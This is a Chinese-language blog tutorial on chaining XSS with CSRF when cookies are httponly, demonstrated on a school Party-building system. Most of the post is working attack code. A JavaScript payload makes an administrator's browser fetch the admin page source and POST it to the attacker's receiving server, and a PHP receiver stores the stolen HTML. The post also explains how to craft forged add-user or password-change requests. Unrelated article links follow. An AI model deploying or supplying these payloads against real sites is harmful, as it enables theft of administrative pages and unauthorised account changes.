当网站cookie设置了httponly,xss获取不到到网站的cookie。但是我们是可以获取到网站后台的url。

这时候我们可以xss得到网站后台源码,从而找到网站后台的一些敏感操作:添加用户,删除用户,修改密码,数据库备份等等。

在这个xss点上,用ajax构造post数据包,添加用户。这就应该是xss+csrf的利用。

最近开发我们学校的党建系统,下面我们来复现一下上面操作:

1、前提是我们已经获得后台的地址了,这时候在xss平台上配置如下代码:

     function createXmlHttp() {

     if (window.XMLHttpRequest) {

         xmlHttp = new XMLHttpRequest()

     } else {

         var MSXML = new Array('MSXML2.XMLHTTP.5.0', 'MSXML2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP', 'Microsoft.XMLHTTP');

         for (var n = 0; n < MSXML.length; n++) {

             try {

                 xmlHttp = new ActiveXObject(MSXML[n]);

                 break

             } catch(e) {}

         }

     }

 }

 createXmlHttp();

 xmlHttp.onreadystatechange = function(){

   if (xmlHttp.readyState == 4) {

         code=escape(xmlHttp.responseText);

         createXmlHttp();

         url = "http://127.0.0.1/resive/resive.php";   //这里是我们服务器接受的地址

         cc = "htmlcode=" + code +"&filename=index.html";

         xmlHttp.open("POST", url, true);

         xmlHttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");

         xmlHttp.send(cc)

   }

 };

 xmlHttp.open("GET", "/dangjian/index.php/Admin/Introduction/index.html", true);//这块填写获得的后台地址。

 xmlHttp.send(null);

resive.php是我们接收的代码:

<?php

        function js_unescape($str) {

                $ret = '';

                $len = strlen($str);

                for ($i = 0;$i < $len;$i++) {

                        if ($str[$i] == '%' && $str[$i + 1] == 'u') {

                                $val = hexdec(substr($str, $i + 2, 4));

                                if ($val < 0x7f) $ret.= chr($val);

                                else if ($val < 0x800) $ret.= chr(0xc0 | ($val >> 6)) . chr(0x80 | ($val & 0x3f));

                                else $ret.= chr(0xe0 | ($val >> 12)) . chr(0x80 | (($val >> 6) & 0x3f)) . chr(0x80 | ($val & 0x3f));

                                $i+= 5;

                        } else if ($str[$i] == '%') {

                                $ret.= urldecode(substr($str, $i, 3));

                                $i+= 2;

                        } else $ret.= $str[$i];

                }

                return $ret;

        }

        $data = js_unescape($_POST['htmlcode']);  //对获得源码js_unescape解码。

        $filename = $_POST['filename'] . date("y-m-d-h-i-s") . ".html";

        $myfile = fopen($filename, "w");

        fwrite($myfile, $data);

        fclose($myfile);

?>

这时候将写好的js代码插入到xss地方,当管理员访问的时候就会将后台的源码发到我们的服务器上。

模拟管理员访问后台,看到将源码发到resive.php上了:

查看收到的源码:

这时候我们认真分析网站后台的源码,哪里链接有敏感操作。这里有修改密码的操作,但是需要我们提供之前的密码。所以就没办法利用。

假设这里没有让提交之前的密码。我们就可以构造添加用户的ajax。再在这个xss利用

<script>

    $(document).ready(function(){

        $("#changePasswordSubmit").click(function(){

            var oldPassword = $("#oldPassword").val();

            var newPassword = $("#newPassword").val();

            var data = {};

            if(oldPassword == ''){

                alert("请输入原密码");

                return false;

            }

            if(newPassword == ''){

                alert("请输入新密码");

                return false;

            }

            if(newPassword != $("#reviewPassword").val()){

                alert("两次密码输入不一致");

                return false;

            }

            data['oldPassword'] = oldPassword;

            data['newPassword'] = newPassword;

            $.ajax({

                url:"/dangjian/index.php/Home/Login/ajax_changePassword",

                type:"POST",

                data:data,

                success:function(data){

                    if(data['code'] === 0){

                        alert(data['data']);

                        $("#oldPassword").val('');

                        $("#newPassword").val('');

                        $("#reviewPassword").val('');

                        $('#changePasModal').modal('hide');

                    }else{

                        alert(data['err']);

                    }

                }

            });

        });

    });

</script>

xss实现获取网站源码的更多相关文章

  1. C语言之socket获取网页源码

    写爬虫也许你用的是python,类似urlopen(url).read()即可获得普通的网页的源码,或者用的java的网络库加上流操作,或者其他高级语言.但你有没有想过使用C语言来实现呢?我曾经以为用 ...

  2. java 企业网站源码模版 有前后台 springmvc SSM 生成静态化

    java 企业网站源码 前后台都有 静态模版引擎, 代码生成器大大提高开发效率 系统介绍 点击:获取地址 : 1.网站后台采用主流的 SSM 框架 jsp JSTL,网站后台采用freemaker静态 ...

  3. 【安卓本卓】Android系统源码篇之(一)源码获取、源码目录结构及源码阅读工具简介

    前言        古人常说,“熟读唐诗三百首,不会作诗也会吟”,说明了大量阅读诗歌名篇对学习作诗有非常大的帮助.做开发也一样,Android源码是全世界最优秀的Android工程师编写的代码,也是A ...

  4. git获取内核源码的方法

    [转]http://www.360doc.com/content/17/0410/16/23107068_644444795.shtml 1. 前言 本文主要讲述ubuntu下通过git下载linux ...

  5. 转载:获取Nginx源码(1.3.5)《深入理解Nginx》(陶辉)

    原文:https://book.2cto.com/201304/19616.html 可以在Nginx官方网站(http://nginx.org/en/download.html)获取Nginx源码包 ...

  6. java自适应响应式 企业网站源码 SSM freemaker生成静态化 手机 平板 PC springmvc

    java 企业网站源码 前后台都有 静态模版引擎, 代码生成器大大提高开发效率 前台: 支持两套模版, 可以在后台切换 系统介绍: 1.网站后台采用主流的 SSM 框架 jsp JSTL,网站后台采用 ...

  7. java自适应响应式 企业网站源码 SSM 生成静态化 手机 平板 PC

    java 企业网站源码 前后台都有 静态模版引擎, 代码生成器大大提高开发效率 系统介绍: 1.网站后台采用主流的 SSM 框架 jsp JSTL,网站后台采用freemaker静态化模版引擎生成ht ...

  8. 响应式Asp.net MVC企业网站源码

    最近时间充裕,自己写了一个响应式MVC企业网站系统,用于回顾自己的MVC知识.网站源码后台和前台都采用响应式布局,可以适应不同的屏幕. 一.源码描述 响应式企业网站系统,前台和后台都采用了响应式布局, ...

  9. 获取android源码时repo的错误

    今天用repo获取android源码:../bin/repo init -u git://android.git.kernel.org/platform/manifest.git出现问题:问题一:Tr ...

随机推荐

  1. C# 泛型使用笔记

    泛型的基本概念我就不在这重复了,不了解的同学请自行百度. 我主要写下我在项目中要到的泛型实例.献丑了.....有什么不好或不对的地方大家尽可评论留言. 为什么要用泛型? 通过使用泛型,我们可以极大地提 ...

  2. 简单的winform编辑器

    using System;using System.Collections.Generic;using System.ComponentModel;using System.Data;using Sy ...

  3. Server 2008 r2 多用户远程桌面配置

    参考资料链接: http://blog.163.com/fan_yishan/blog/static/476922132013018594951/ 按照以上链接的博文一步步进行配置,因为我是英文操作系 ...

  4. K:单例模式中存在的问题

      对于单例模式的实现,无论其是否具有懒加载的功能,我们的目标是有且仅生成一个对象.但是,实际上,对于单例模式的一般实现,都会存在着以下的两个问题: 序列化攻击: 对于枚举方式实现的单例模式,并不存在 ...

  5. 5.Resource注解解析

    Resource有两种使用场景 1.Resource 当Resource后面没带参数的时候是根据它所注释的属性名称到applicationContext.xml文件中查找是否有bean的id与之匹配, ...

  6. Spring Data JPA —— 快速入门

    一.概述 JPA : Java Persistence API, Java持久层API,是JDK 5.0注解或XML描述对象-关系表的映射关系,并将运行期的实体对象持久化到数据库中. Spring D ...

  7. BZOJ4903: [Ctsc2017]吉夫特

    传送门 可以发现,\(\binom{n}{m}\equiv 1(mod~2)\) 当且仅当 \(m~and~n~=~m\) 即 \(m\) 二进制下为 \(n\) 的子集 那么可以直接写一个 \(3^ ...

  8. APM飞控系统详细介绍

    APM飞控系统详细介绍2013-04-05 12:28:24   来源:   评论:2 点击:10303 APM飞控系统是国外的一个开源飞控系统,能够支持固定翼,直升机,3轴,4轴,6轴飞行器.在此我 ...

  9. AndroidStudio中logcat不输出信息

    2017年11月27日,记住这个日子.今天第一次感觉到被批评了,由于自己技术知识储备不足导致今天的外出工作等于浪费时间.正式因为这个logcat不输出信息的问题,前几回不输出信息了我就从新启动了开发工 ...

  10. Newtonsoft.Json 动态解析 json字符串

    有一个json字符串是动态的,如下面,columns中的数量是不固定的,因此就不能使用反序列化类的方法了: 因此使用这样一种方式,把columns中的所有东西都输出出来: public void Ge ...